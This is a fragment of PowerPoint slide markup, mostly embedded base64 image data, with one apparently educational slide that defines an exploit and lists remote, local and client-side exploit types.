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4130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2426" y="457201"/>
            <a:ext cx="8181974" cy="1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now we need an exploit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5575" y="1371600"/>
            <a:ext cx="8836025" cy="5029200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is an exploit?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	A piece of software, chunk of data, or sequence of commands that takes advantage of a bug, glitch, or vulnerability in order to cause unintended or unanticipated behavior to occur on computer software or hardware.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Types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	- Remote</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		Runs over a network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 	- Local</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		Runs on the victim directly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	- Client Side</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		Runs on a client such as a browser or other application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 4" descr="data:image/jpeg;base64,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9" descr="data:image/jpeg;base64,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